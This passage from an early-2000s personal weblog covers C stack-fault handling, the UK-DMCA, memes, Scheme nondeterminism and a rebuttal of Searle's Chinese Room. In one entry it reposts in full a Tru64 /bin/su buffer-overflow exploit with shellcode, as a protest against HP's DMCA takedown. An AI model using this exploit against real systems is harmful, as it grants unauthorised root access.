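max_threads = address_space // reserved_per_stack
mapped_bytes = max_threads * touched_per_stack

print(max_threads)          # 16384
print(mapped_bytes // MIB)  # 128 (MiB), i.e. about 134 MB
```

    Halving the reservation to 64KiB would double the thread limit, at the cost of a lower ceiling on how deep any one stack can grow.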

    The actual page fault handling turns out not to be too hard. First mmap a couple of pages from /dev/zero for the signal stack (since we are trapping when we run out of stack we need the SIGSEGV handler to run on a different stack), fill out a stack_t struct and set up the SIGSEGV handler to use it. In the handler, process the siginfo_t to find the stack which faulted and use mmap to add another page to it:

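    #include <fcntl.h>
    #include <signal.h>
    #include <stdlib.h>
    #include <sys/mman.h>

    #define SIGSTACK_SIZE 8192

    static void
    sig_segv (int sig, siginfo_t *siginfo, void *d)
    {
    	// Walk the threads and find the one that faulted from the fault
    	// address in siginfo->si_addr
    
    	// Use mmap with MAP_FIXED to map in another page at the right place
    }
    
    void
    setup_fault_handler (void)
    {
    	stack_t sigst;
    	struct sigaction sigact;
    	char *sigstack;
    	int devzerofd;
    
    	devzerofd = open ("/dev/zero", O_RDWR);
    	if (devzerofd < 0)
    		abort ();
    
    	// The handler needs its own stack: the faulting thread has none left
    	sigstack = mmap (NULL, SIGSTACK_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, devzerofd, 0);
    	if (sigstack == MAP_FAILED)
    		abort ();
    
    	sigst.ss_sp = sigstack;
    	sigst.ss_flags = 0;
    	sigst.ss_size = SIGSTACK_SIZE;
    
    	sigact.sa_sigaction = sig_segv;
    	// block no extra signals while the handler runs
    	sigemptyset (&sigact.sa_mask);
    	sigact.sa_flags = SA_ONSTACK | SA_SIGINFO;
    
    	if (sigaltstack (&sigst, NULL) < 0 || sigaction (SIGSEGV, &sigact, NULL) < 0)
    		abort ();
    }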
    

    This is pretty cool (need...

    This is pretty cool (needs javascript). Go there and play before reading the rest of this.

    Very few numbers can be produced by subtracting the sum of a number's digits from the number itself. 10-19 give an answer of 9, 20-29 give an answer of 18 and so on through the multiples of 9. This reduces the possibility set drastically.

    The next thing to realise is that the possibilities are spaced out evenly and all the possibilities have the same symbol. Quite neat.
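
    You can check the first claim by brute force. A small sketch in Python, assuming the trick is the usual one of picking a two-digit number and subtracting the sum of its digits; minus_digit_sum is just a name I've picked:

```python
def minus_digit_sum(n):
    """Return n minus the sum of its decimal digits."""
    return n - sum(int(d) for d in str(n))


results = {minus_digit_sum(n) for n in range(10, 100)}
print(sorted(results))  # [9, 18, 27, 36, 45, 54, 63, 72, 81]
```

    Writing the number as 10a + b makes it obvious why: (10a + b) - (a + b) = 9a, so only nine answers are possible however you choose.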

    BitTorrent

    First release of bttrackd (my BitTorrent tracker) is here

    UK-DMCA

    On the UK-DMCA, quoting myself from a debian-uk post:

    The consultation lasts until the end of October and I think they are
    looking to pass the bill by the end of year. It's only August and we
    have to be careful not to move too fast. We are fighting against the
    treacle of people's attention spans and it takes a massive amount of
    energy to keep anything moving against that for  months. More energy
    than we have. We should wait until a few (3-4, I guess) weeks before
    the vote and blitz the press (as was done for the RIP extension, but
    then we didn't have much choice about the timing).
    
    Though that doesn't mean that we can't start preparing for it before
    then.

    MetaFun

    After giving up ages ago on getting any of the funky ConTeXt stuff working, I took the plunge and installed TeTeX, ConTeXt and Metafun manually. Seems to be working - I managed to compile this at least (just a few rip offs of examples from the metafun manual). I need to run mpost manually though.

    UK Political Corruption

    The UK implementation of the EU copyright directive (read: UK-DMCA) has been published. The fight continues. Here's NTK's summary:

    when this becomes law, the "contract" you have with a copyright holder will almost completely trump your right as a purchaser of copyrighted material. And your contract is hereby defined by the copy protection technologies the distributors stick on your media. So if that CD doesn't play on your PC - well, that's what you "agreed" to, and there's nothing you can do. If you try and circumvent any the copy protection (or, in the case of computer programs, explain how to do so to anyone else), you can be punished as much as if you were pirating the data yourself (Article 6). Heck, if you even try to remove any of the tracking spyware, you'll be in equal amounts of trouble (Article 7).

    Is anyone organising the defence? Time for another letter to my MP I guess

    All the security problems in 2.4.18 are listed in the 2.4.19-sec notes. However, if you're in the US the DMCA means it cannot be published there [FAQ]. Non-US citizens can get it here. Of course, all this moral high ground is about to collapse under the weight of the UK-DMCA.

    The Labour Party (who currently hold power in the UK for a second term, after the biggest second term election victory ever) have dire fiscal problems. They are estimated to be £6-8 million in debt and have had to ask for a donation of £100,000 from the unions to cover short term costs.

    The unions obliged and are making no secret of the fact that they expect something in return in terms of policy decisions.

    Am I the only one whose jaw dropped at the way this corruption (and that's what it is) is accepted? If a business did the same there would be political hell to pay. It's time for public funding of political parties.

    (and maybe then the MP3 party can have a good stab :))

    setuidgid and chroot

    setuidgid is a utility program included with daemontools. It occurs to me that it's impossible to use this safely with chroot:

    chroot(2) requires root on most systems, therefore it must be run before setuidgid. This means that setuidgid is run with root permissions (as it always must be) and must be in the chroot jail in order for chroot(1) to run it. Thus if the final process in the chain (usually the one that setuidgid execs) is exploited it can change the setuidgid binary in the jail, and so run code as root the next time that daemon is started.

    I'm working on a BitTorre...

    I'm working on a BitTorrent tracker in C, as Bram asked for one in the todo. It's half-done I guess and since the point of it is speed it has some pretty funky data structures which are going to take a while to debug. In fact the function to verify them is looking pretty hairy.

    Unless you have your head deep in the sand you'll know that Edsger Dijkstra has died of cancer. Joey has the best writeup so far.

    Cryptome has long served as the website for information that some people wouldn't like published. It now has a companion site, The Memory Hole. Salute these people - they do the good work.

    CodeCon 2003 Call For Pap...

    Memes Redux

    I head off home tomorrow. I would have gone today but the British rail system being what it is (which is generally ok, but crap on Sundays) the only train was at 23:30 and gets in at 9 tomorrow morning.

    Keith commented on my ramble about memes on Wednesday. I'll expand a little on that today.

    I think a lot of my ramble can be represented as the question "Is elegance a fundamental environmental factor for memes?". The fitness function for a genetic algorithm has 2 parameters - the replicator and the environment. The environment can be split into fundamental factors and other replicators.

    As an example, in gene evolution rain is a fundamental factor of the environment (at least it is here). If the gene causes its host to explode whenever it rains that seriously hurts its fitness. (Not to mention creating a real mess.) In the same example, predators are other replicators affecting the environment of a gene. If the gene causes the host to light up in the ultraviolet and its predators see ultraviolet then that, too, will hurt its fitness.

    So is elegance a fundamental factor or a meme? I can think of evidence for and against - but in the end I guess the argument is a little pointless. If anyone disagrees (with either assertion) - feel free to reply

    Memes

    I'm going to quote out of an email reply I just wrote tonight. It's a little rambling, but never mind. I think it's kind of interesting and hopefully will help me get a grip of my thoughts faster next time I'm thinking around these areas.

    Tune of the moment: Scooter - Ramp (The Logical Song) (Radio Mix)

    I don't think memes/genes are conscious, but I do think that, as replicators, they can exert a powerful influence to aid their replications. You can often pick out features in memeplexes (a set of interacting memes which can be functionally treated as a whole) designed as an `immune system' etc. For example the Christian ideas of "I am the one true god, worship no other" and of faith seem (to me) to fit into that category.

    You can certainly pick out other categories of memes in memeplexes too:

    • Insertion vectors:
      • explaining the meaning of life
      • giving hope after death
    • Gene interactions, keeping the host alive:
      • Rules for hygiene and living
    • Replication:
      • (Evangelical branches are strong in these)
      • Unbelievers go to hell come Judgement Day
      • Missionary stories
    • Benefit for the creator (sometimes):
      • Scientology

    Memes/genes also provide an ethical axiom which allows the construction of morals which I consider to be reasonable. Of course I'm working backwards here (from the high level towards the axioms) and I'm sure that working the other way could lead to morals that I couldn't accept.

    However, it does lead to some positions which many would find objectionable. For one, I'm much more supportive of animal testing than most. I'm also quite supportive of the idea of genetically modifying a human germline with the proviso that we get better at it first.

    I don't think I can articulate the structure I want to at the moment. Maybe I'll come back to it later. (if you're reading this I guess I didn't).

    Later: Ok, I still don't think I can articulate it so I'm leaving that last paragraph in, but here goes:

    Since I'm making value judgements about moral systems I must have some built in morality (memes) which almost certainly come from my upbringing. My upbringing is mostly Christian, but not strongly so. My parents don't go to church etc so I have a pretty common Western set (don't kill people, be nice etc).

    However, I feel the need to justify those memes and I flat out reject the theistic aspects of Christianity. I also reject some of those upbringing moral memes. So either I have `scientific model' memes too or something is built in.

    Now, morals change all over the world and can generally be overridden/ignored in a Lord of the Flies type of way. But there is a certain sense of grace that I'm wondering might be built in. The grace I'm talking about is the beauty of great mathematical proofs or the elegance of superb design.

    I cannot see that this is generally communicated as a meme and it seems to have existed (in some individuals) in many different cultures and at many different times.

    So maybe my need to justify my moral set comes from an inbuilt human attribute rather than a meme. And a justification needs axioms, which is where memetic theory came in.

    HP uses the DMCA to try a...

    HP uses the DMCA to try and hide security problems in Tru64: /. and News.com. Here it is for all you people anyway:

    /*
     /bin/su tru64 5.1
     works with non-exec stack enabled
     
     stripey is the man
    
     developed at http://www.snosoft.com in the cerebrum labs
    
     phased
     phased at mail.ru
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    char shellcode[]=
    	"\x30\x15\xd9\x43"      /* subq $30,200,$16             */
    	"\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
    	"\x12\x14\x02\x42"      /* addq $16,16,$18              */
    	"\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
    	"\x12\x94\x09\x42"      /* addq $16,76,$18              */
    	"\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
    	"\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
    	"\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
    	"\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
    	"\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
    	"\x10\x04\xff\x47"      /* clr $16                      */
    	"\x11\x14\xe3\x43"      /* addq $31,24,$17              */
    	"\x20\x35\x20\x42"      /* subq $17,1,$0                */
    	"\xff\xff\xff\xff"      /* callsys ( disguised )        */
    	"\x30\x15\xd9\x43"      /* subq $30,200,$16             */
    	"\x31\x15\xd8\x43"      /* subq $30,192,$17             */
    	"\x12\x04\xff\x47"      /* clr $18                      */
    	"\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
    	"\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
    	"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
    	"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
    	"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
    	"\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
    	"\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
    	"\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
    	"\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
    	"\x13\x94\xe7\x43"      /* addq $31,60,$19              */
    	"\x20\x35\x60\x42"      /* subq $19,1,$0                */
    	"\xff\xff\xff\xff";     /* callsys ( disguised )        */
    
    /* shellcode by Taeho Oh */
    
    main(int argc, char *argv[]) {
    int i, j;
    char buffer[8239];
    char payload[15200];
    char nop[] = "\x1f\x04\xff\x47";
    
    bzero(&buffer, 8239);
    bzero(&payload, 15200);
    
    for (i=0;i<8233;i++)
            buffer[i] = 0x41;
    
    /* 0x140010401 */
    
            buffer[i++] = 0x01;
            buffer[i++] = 0x04;
            buffer[i++] = 0x01;
            buffer[i++] = 0x40;
            buffer[i++] = 0x01;
    
    for (i=0;i<15000;) {
    	for(j=0;j<4;j++)  {
            	payload[i++] = nop[j];
    	}
    }
    
    for (i=i,j=0;j<sizeof(shellcode);i++,j++)
    	payload[i] = shellcode[j];
    
    	printf("/bin/su by phased\n");
    	printf("payload %db\n", strlen(payload));
    	printf("buffer %db\n", strlen(buffer));
    
    	execl("/usr/bin/su", "su", buffer, payload, 0);
    
    }
    

    Semantic Web

    Zooko has gone away again and shut down his mail server. However, I'm ready for him this time! I'm getting quite good with qmail because of all this.

    Buffer overflows in OpenSSL make a mess of a number of programs. However, these came to light because of a number of code reviews so this is an example of open source working, security wise. It would be nice to know that the privsep code in OpenSSH stops these overflows from really doing damage - but I haven't heard anything to that effect. Boxes upgraded anyway.

    Also, big bugs in PHP 4.2.[01]. Fixed in 4.2.2. All upgrade.

    Programming with Schelog. Pretty cool - for best results mix with the SemWeb (see below)

    Today's/tonight's reading was semantic web stuff. The W3C and TimBL (not to be confused with the other TBL who I have mentioned here before) have been talking about this Semantic Web stuff for ages. This SciAm article (May, 2001) is a good introduction and TimBL talks lots about it towards the end of Weaving the Web. However, all they seem to have is a lot of talk. All the talk lays out a system of logic graphs with a simple type system. The type system is too simple but they hint about DAML+OIL and WebOnt WG as better ones, so why don't they switch?

    I can't help feeling that the actual content of the Semantic Web group could have been knocked out over a couple of weekends. What they should be doing is building a good Schema defining relations for many different groups and knitting them together because that's political work and the clout of the W3C would help lots. Then they can actually start pushing it and say "Here's the schema for a [bookshop|weblog|generic company], markup your stuff and look what our cool tools can do!"

    It wouldn't be perfect, but face it, it's not going to be perfect anyway and it doesn't have to be. Worse is sometimes better; UNIX killed the Lisp machine.

    (and on a more technical note: they don't seem to have the concept of different relations holding at different times. And, talking of that, they don't even seem to have defined how to spec a time - that's how primitive it still is)

    It also occurs to me that one of the bumps on the road for the Semantic Web is that companies don't actually really want to help the customer. Remember how the hype said that web agents would be searching all the vendors' web sites and finding the cheapest for a given item? (And this was going to be done by about 1995 or something.) Well the SemWeb is a step on the way to that situation and that isn't good news for companies as it forces them into price wars on many goods. Thus I expect that they are going to resist exposing information like that and form confusopolies (that's a Dilbert word, and a really good one).

    Scheme

    Well, I did come up with a load of links over the weekend and wrote up an IV entry - then promptly forgot to upload it. Rats. That'll sit at home for another couple of weeks now

    However, here are some that I dug out today:

    You're going to have to Google for the rest of the links today

    God it's hot. Not going to be sleeping well tonight

    Been looking at Bigloo - a compiler for (mostly) R5RS Scheme which outputs C and Java bytecodes as its backends. One very nice feature is that it's designed to work with Java/C native code really well. However much we might wish it wasn't, the reality is that FFI interfaces in higher level languages (now there's a vague term (and a redundant acronym for that matter)) are really important.

    It even manages to compile non-deterministic code using call/cc (see the snippet below, mostly from On Lisp)

    In addition it has a nice (ILISP like) Emacs interface and what looks like a very nice native IDE, called BDK. I say looks like because I cannot get it to compile, but the screen shots are impressive

    LtU has a link to conference notes about Bigloo's TK based GUI toolkit, called BigLook

    (module nondet)
    
    (define *paths* '())
    (define failsym '@)
    
    ;; Return the first choice now; stash a thunk that retries with the rest
    (define (choose choices)
      (if (null? choices)
          (fail)
          (call-with-current-continuation
           (lambda (cc)
             (set! *paths* (cons (lambda () (cc (choose (cdr choices)))) *paths*))
             (car choices)))))
    
    (define fail 0)
    
    ;; fail resumes the most recently stashed path, or gives up with failsym
    (call/cc
     (lambda (cc)
       (set! fail
             (lambda ()
               (if (null? *paths*)
                   (cc failsym)
                   (let ((p1 (car *paths*)))
                     (set! *paths* (cdr *paths*))
                     (p1)))))))
    
    (define small-ints '(1 2 3 4 5 6 7 8 9 10))
    
    (define sum
      (lambda (x)
        (let ((a (choose small-ints))
              (b (choose small-ints)))
          (if (= (+ a b) x) (cons a b) (fail)))))
    
    (display (sum 19))(newline)
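
    For anyone who doesn't read Scheme, the search that the snippet performs can be sketched in Python. This is not a translation of the call/cc machinery: it's a plain depth-first enumeration which tries a in order and, for each a, every b in order, and treating that ordering as the part that matters is an assumption on my part. sum_pair and FAILSYM are illustrative names.

```python
from itertools import product

SMALL_INTS = range(1, 11)
FAILSYM = "@"  # returned when every choice has been exhausted


def sum_pair(x):
    """Return the first (a, b) from SMALL_INTS with a + b == x, trying a
    in order and, for each a, every b in order; FAILSYM if none exists."""
    for a, b in product(SMALL_INTS, repeat=2):
        if a + b == x:
            return (a, b)
    return FAILSYM


print(sum_pair(19))  # (9, 10)
```

    What the continuation version buys you is that choose can be called from anywhere in ordinary code, without restructuring the program into nested loops like this.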
    

    This is the entry I forgo...

    This is the entry I forgot to upload last weekend

    Since I'm at home for the weekend you get a links post with some of the stuff over the past couple of weeks. I left my laptop in Guildford so I don't have all the bookmarks I wanted, but here are some:

    Lack of Links

    Well, (setting the scene), I'm sitting in a small hotel room in Guildford on a very comfortable red seat with my laptop on my lap.

    The aforementioned red chair looks a little out of place in the room because, although you could swing a cat in it, it would hit its head on all the walls. Thus in a room where space is at a premium it seems a little wasteful to put this seat in it.

    But it is a comfy seat. Even compared to the seats at work it's pretty good and that's saying something because the seats at work are special geek seats which cost about £500 and have more knobs and levers than some aircraft flight decks on the underside. (The underside of the chair, not the flight decks).

    I'm also listening to music (I should have mentioned that before). It's music that I found lying about the network at work. I love listening through other people's music sometimes because you can pick out some real gems. Think about the number of different CDs in an average record shop and how few of those you've ever heard. Collaborative filtering is the only way to find any good non-mainstream stuff since radio stations are hopeless. (and the RIAA shutdown all the Internet radio stations).

    At the moment the track is The Strokes - Last Nite (sic). Now The Strokes aren't really very non-mainstream but I don't listen to enough of them anyway.

    However, the last track was cool and by an artist/group called Royksopp, who I've never heard of and that's the fun of it. (There should be two dots above the o in that name, but I'm not feeling brave enough to put a non-Latin1 code point in tonight).

    The night life (for me) is pretty dire here, though. I'm the only person of my age group living in Guildford and working at Lionhead so I can't really go out. (I'm not really the sort to go out alone and try to hook up with someone). Which is a shame because Guildford is a University town and looks like having a great night life.

    It's not too bad though. I don't get in from work until about 6:45 and by the time I've gone out to fetch dinner and watched some TV it's about 8:00, and I've enough to read.

    And I'm coming home for the weekend. Catching the train at 5:45 and getting in to Cheltenham at 8:30 where father is driving me to a party. Have another party on Sunday and I catch the train again at 6:45 Monday morning for work. No rest for the wicked!

    Then I've another two weeks before heading home. Where I have to pick out book prizes, go see people at the Playhouse, get exam results and then fly off to Korea.

    (The school prizes are always in the form of money off books at the book shop in Gloucester. You have to go in and order the books (paying any extra) and then you have to wait 6 weeks to actually get the book at the prize evening. So the trick is to find books that you want - but don't want enough to be bothered about not actually having them for 6 weeks. And they've got to be non-fiction books really.)

    And this year I've got to pick out three (Maths, Biology and Service to the School). Though the books don't have to be related to the subject.

    Since I don't have an internet connection at the hotel I tend to read stuff at work and save any longer stuff on my laptop for later reading. This leads to a lack of good links I'm afraid. Do a Google search for Markus Kuhn though. His homepage at cam.ac.uk is well worth reading.

    I did get that 802.11b connection going, but the access point isn't configured to forward packets unfortunately. The SNMP private community has been changed and it's probably a little rude to reconfigure someone else's AP anyway.

    List Archives

    Assertion: mailing lists which are archived should put the URL for a given message in its header

    If the above were true I could point you at a neat little post on ll1. But it isn't and I cannot look up the URL so you'll have to do without
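
    As a sketch of what that could look like, here is the list software stamping the archive URL into each message before sending it out. The header name Archived-At is the one RFC 5064 later defined for exactly this purpose; the host name, the URL and the helper add_archive_url are all made up for illustration.

```python
from email.message import EmailMessage


def add_archive_url(msg, url):
    """Record where the archived copy of `msg` lives, in its header."""
    msg["Archived-At"] = f"<{url}>"
    return msg


msg = EmailMessage()
msg["Subject"] = "A neat little post"
msg["List-Id"] = "<list.example.org>"
add_archive_url(msg, "https://list.example.org/archive/0001.html")
print(msg["Archived-At"])
```

    The list software already knows where it is about to file the message, so it is the natural place to add the header; the reader's mail client only has to display it.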

    Notes to self

    TBL says that a quantum computer can be implemented on a UTM and the quantum bit is just a speed thing. However, there are quantum effects which are non-deterministic and so cannot be done on a UTM.

    TBL also says I should read up on Goldstein randomness. (not sure about the spelling there).

    Eek. Been a long time sin...

    Eek. Been a long time since I've updated this site - been pretty busy. Also, I've forgotten my power converter for my laptop so this entry cannot be too long as I'm draining the last of my laptop batteries

    I've switched hotels and the room is a lot smaller this time. But it's closer to work and there's actually an 802.11b network here. I don't have the right programs installed (will be apt-getting tomorrow at work) but someone is broadcasting 81 byte packets which seem to be ethernet wrapped in some header that ethereal doesn't understand. They all have the string EDWIN in them as well, for some reason

    Since I don't have connectivity outside work I haven't really been keeping up with stuff so you'll all have to dig up your own interesting links

    (P.S. I still don't have ispell installed - I keep forgetting)

    Well, I dug out the entry...

    Well, I dug out the entry from the html of IV and patched it in. I should be able to upload all this tomorrow at work. I need to install the ispell dictionary though. Unfortunately, I didn't copy my user dictionary off my desktop before I went away - rats.

    Of course, I can't talk about what I'm doing at work - but it's very interesting. I need to do more thinking tonight before prototyping it tomorrow.

    I'm packing at the moment...

    I'm packing at the moment ready for a move to Lionhead for the summer. (Warning: rubbish, Flash web site)

    Old news now, but Cannabis has been downgraded to a class C drug. Basically it's now less illegal to possess it, but more so to sell it. I actually think this is a bad thing. Predictably, many are saying the sky will fall because of all the people smoking pot (as they, themselves, smoke their cigars and sip their G&Ts). But this will lead to more money going into the pockets of criminals whose best interests are to try and get people addicted to dangerous drugs (crack, heroin etc). This is going to lead to a backlash and put sensible drugs policy back years.

    Zooko is back!

    A couple of online books I intend to read: Bitter Java and ORA: OCaml [via LtU]

    Shorter, interesting reads: OpenBSD Honeypot [via /.] and How Modern Chemicals May Be Changing Human Biology

    Buffer Overflow in PGP7Ne...

    Buffer Overflow in PGP7

    New M$ DRM patent

    NLP Tricks

    When it rains - it pours. Seems I'm going to be a lot more busy this holiday than I had planned. Connectivity will be patchy at best over the coming days.

    John Searle: I Married a Computer

    Yesterday I made the comment that John Searle's chapter in "Are We Spiritual Machines?" was rubbish. Here's why:

    Summary
    • Searle uses his old Chinese Room argument (and the same thing in a number of different guises). It's no better an argument now than it has ever been
    • All of Searle's differences between computers and humans can be shown to have no actual fundamental point of distinction
    • I need to know if quantum computers can be simulated on a UTM

    I'm going to run a commentary on Searle's chapter and, in doing this, I'm leaving a lot out of course. You are welcome to read the chapter in full to get the context for these quotes. I purposefully avoided reading Kurzweil's reply.

    Here is the difference: Kasparov was consciously looking at a chessboard, studying the position and trying to figure out his next move. He was also planning his overall strategy and no doubt having peripheral thoughts about earlier matches, the significance of victory and defeat, etc. We can reasonably suppose he had all sorts of unconscious thoughts along the same lines.

    From that I would like to continue a little: Kasparov was studying the consequences of a set of possible moves. His subconscious has filtered most of the illegal moves before his conscious even considers them. The impressive pattern matching ability of his brain is making links with previous games and recalling which moves proved advantageous in those situations.

    Does anyone think that is unreasonable? Where is the magical factor in that?

    The computer has a bunch of meaningless symbols that the programmers use to represent the positions of the pieces on the board. It has a bunch of equally meaningless symbols that the programmers use to represent options for possible moves. The computer does not know that the symbols represent chess pieces and chess moves, because it does not know anything. As far as the computer is concerned, the symbols could be used to represent baseball plays or dance steps or numbers or nothing at all.

    Does Searle think that my visual cortex is aware of what chess is when it highlights edges and surfaces? The pattern matching systems of the brain are very general (try staring at clouds or even a blank wall for a while) and certainly aren't designed for processing chess positions. Why is it that symbol processing deserves such contempt?

    I'm sure Searle would argue that there is a conscious kernel of the brain which is somehow `above' the mundane tasks of the brain. So is a child, playing for the first time with a rule book, not really playing chess? The child is doing the same as the computer is, looking at the rules for valid configurations; judging those configurations and then moving. At what point does the child actually start to really play chess?

    Let us call it the Chess Room Argument. Imagine that a man who does not know how to play chess is locked inside a room, and there he is given a set of, to him, meaningless symbols. Unknown to him, these represent positions on a chessboard. He looks up in a book what he is supposed to do, and he passes back more meaningless symbols. We can suppose that if the rule book, i.e., the program, is skillfully written, he will win chess games. People outside the room will say, "This man understands chess, and in fact he is a good chess player because he wins." They will be totally mistaken. The man understands nothing of chess; he is just a computer. And the point of the parable is this: If the man does not understand chess on the basis of running the chess-playing program, neither does any other computer solely on that basis.

    This is the Chinese Room argument (for which Searle is best known). Usually the man in the room is processing Chinese symbols.

    Again, the fallacy in this argument occurs in two places. Firstly, no neuron in my brain understands anything. If I filled a Chess Room with 1000 people, handling the task as a team, why do you expect any of them to understand it? The understanding is an emergent property of the actions of all the people and the records they are making.

    The second problem is very similar to the one I outlined above. I'm sure this poor man will quickly become quite fast at processing the rules if he spends any reasonable length of time doing it. At some point he may recognise that the data he is handing out look like 2D coordinates and he could draw a grid inside his box to help him keep track, with symbols for the pieces. With no previous knowledge of chess he could become quite adept as his brain starts recognising patterns and caching the results so he doesn't repeat the same calculations. At what point is he really playing chess then?

    Imagine that I, who do not know Chinese, am locked in a room with a computer program for answering written questions, put to me in Chinese, by providing Chinese symbols as answers. If properly programmed I will provide answers indistinguishable from those of native Chinese speakers, but I still do not understand Chinese. And if I don't, neither does any other computer solely on the basis of carrying out the program.

    Reread the reply to the last quote. The faults are the same.

    Kurzweil assures us that Deep Blue was actually thinking. Indeed he suggests that it was doing more thinking than Kasparov. But what was it thinking about? Certainly not about chess, because it had no way of knowing that these symbols represent chess positions. Was it perhaps thinking about numbers? Even that is not true, because it had no way of knowing that the symbols assigned represented numerical values. The symbols in the computer mean nothing at all to the computer. They mean something to us because we have built and programmed the computer so that it can manipulate symbols in a way that is meaningful to us.

    I'm left wondering what, exactly, chess pieces mean to us that makes Deep Blue so fundamentally different. If I were to rename and redesign the pieces (without changing the rules) I'm still playing chess. Now if I number them all and replace them with bits of paper, I have to remember what the numbers mean, but I'm still playing chess. Now if I get rid of the board and imagine all the numbers on a grid in my head, I'm still playing chess. If I don't imagine a grid, but remember the positions also as numbers, I'm still playing chess (but I don't get to use the pattern matching systems of my brain). What's so different between myself and the computer now?

    He confuses the computer simulation of a phenomenon with a duplication or re-creation of that phenomenon. This comes out most obviously in the case of consciousness. Anybody who is seriously considering having his "program and database" downloaded onto some hardware ought to wonder whether or not the resulting hardware is going to be conscious.

    (in this, Searle is talking about downloading yourself into a computer by mapping and simulating your brain - Diaspora style)

    Exactly what is so magical about neurons? Most animals have less advanced myelin sheaths than humans do, and so have slower moving nerve impulses. This small change doesn't disqualify them from Searle's elite club.

    It's unfortunate that all higher animals share the same basic nerve structure, however, as it isn't possible to point to another example. But we have a pretty good understanding of how nerves work, so I can pick a single neuron and replace it with a device that records incoming impulses and can trigger outgoing impulses. This device communicates via radio to a computer which controls it and simulates the neuron I replaced. (This is just in theory, I'm not saying I could do this today.)

    If I continued to replace neurons with perfect simulations of them I doubt even Searle would suggest that I'm altering anything about my brain functionally. So either I can replace my whole brain that way and simulate it all in the computer (at which point the actual neuron replacing devices can be discarded) or he's suggesting that there is something so special about neurons that they cannot even theoretically be simulated.

    Actual human brains cause consciousness by a series of specific neurobiological processes in the brain. What the computer does is a simulation of these processes, a symbolic model of the processes. But the computer simulation of brain processes that produce consciousness stands to real consciousness as the computer simulation of the stomach processes that produce digestion stands to real digestion. You do not cause digestion by doing a computer simulation of digestion. Nobody thinks that if we had the perfect computer simulation running on the computer, we could stuff a pizza into the computer and it would thereby digest it. It is the same mistake to suppose that when a computer simulates the processes of a conscious brain it is thereby conscious.

    I'm afraid I'm not even going to dignify that analogy with a reply. It's just absurd. Unfortunately for Searle, the absurdity is less hidden in this case than in his arguments above.

    "This thesis says that all problems that a human being can solve can be reduced to a set of algorithms, supporting the idea that machine intelligence and human intelligence are essentially equivalent."
    That definition is simply wrong. The actual thesis comes in different formulations (Church's is different from Turing's, for example), but the basic idea is that any problem that has an algorithmic solution can be solved on a Turing machine, a machine that manipulates only two kinds of symbols, the famous zeroes and ones.

    (The first part, in quotation marks, is Searle quoting Kurzweil)

    In what way is my neural net fundamentally different to a computer? It may well have some impressive emergent features, but are you suggesting (again) that neurons are fundamentally different from a UTM? At this point people usually start muttering the word "quantum" as an answer. Firstly, we have quantum computers anyway and, secondly, I'm pretty sure that a UTM can simulate a quantum computer and that the quantum aspect is just a matter of speed. (Can anyone confirm/deny this?)
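    For what it's worth, the usual textbook answer to the simulation question is yes: a classical machine can track all 2^n amplitudes of an n-qubit register, it just needs time and memory that grow exponentially with n. Here is a rough sketch of that idea in Python. The function names are made up for illustration and only the Hadamard gate is implemented, so treat it as a toy rather than a real simulator.

```python
import math

def apply_hadamard(state, qubit):
    """Apply a Hadamard gate to one qubit of a state vector of 2**n amplitudes."""
    h = 1 / math.sqrt(2)
    new = list(state)
    bit = 1 << qubit
    for i in range(len(state)):
        if i & bit == 0:
            # i and i | bit differ only in the chosen qubit
            a, b = state[i], state[i | bit]
            new[i] = h * (a + b)
            new[i | bit] = h * (a - b)
    return new

def uniform_superposition(n):
    """Start in |00...0> and put every qubit through a Hadamard gate."""
    state = [0.0] * (2 ** n)
    state[0] = 1.0
    for q in range(n):
        state = apply_hadamard(state, q)
    return state
```

    The list doubles in length with every extra qubit, which is where the "matter of speed" comes from.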

    The rest of the chapter is just Searle sniping at Kurzweil and he doesn't put forward anything new.

    The conclusion is at the top in the Summary box really. I won't repeat it here.

    Joey has a great tribute to Gene

    Joey has a great tribute to Gene. I actually have no recollection of signing Joey's book, but I'm glad that I've met him unknowingly!

    Crumbs - I'm playing a part in Aaron's dreams

    LiveJournal has become the latest RSS agent. You can now add RSS feeds as friends (for example theregister).

    "This is nothing. In a few years, kids are going to be demanding septal electrodes." Timothy Leary. Hasn't happened yet though Tim. The links at the bottom of the page are highly worth a read.

    Have been reading John Searle's chapter in "Are We Spiritual Machines?". It's well written, but just .. wrong. I'm sorry, but his arguments are just rubbish.

    (quick warning, kurzweilai.net is a pile of crap in terms of presentation, but the content is good)

    It seems that Gene shot h...

    It seems that Gene shot himself

    Dubya losing the benefit of the doubt from the National Post (Canadian) [via Keith]. He still has a 70% approval rating though.

    Notes on Fitz. Still vapourware at the moment but with people like Raph involved, it could be quite something.

    The detailed designs of the MS TCP/IP stack [via coderman]. It has a little market-droid speak in it at times ("strategic enterprise network transport for its platforms" <- bullshit alert), but it has enough real content to be worth a skim. A recent traffic sniff of a root DNS server showed that Dynamic DNS requests to alter the root (from MS's screwed up implementation) made up a significant fraction of the traffic.

    Pretty graphs. It's sites like these that make 56K users feel it.

    The person with the file:///dev/null turns out to be Ian Hill:

    In ELinks you can set a fixed referer in the options menu. In fact it tries its best to stop you sending *real* referers by flagging that option as "Default - Insecure". It also lets you have no Referer: at all!

    ELinks is a modified version of Links which does SSL (apparently, I can't test it though as it won't use a proxy).

    I'm pretty sure that standard Links does SSL too, but it doesn't have the Referer thing. Finally a browser which actually follows that obscure bit of the RFC.

    Paul Graham assures me (via email) that stuff is still happening to Arc (his new Lisp). Unfortunately the code seems to be non-public at the moment.

    Channel 4 haven't been showing reruns of Ally McBeal in the afternoons this week so I'm going to have to watch the dreaded new series tonight.

    Wired has a piece on Gene's death...

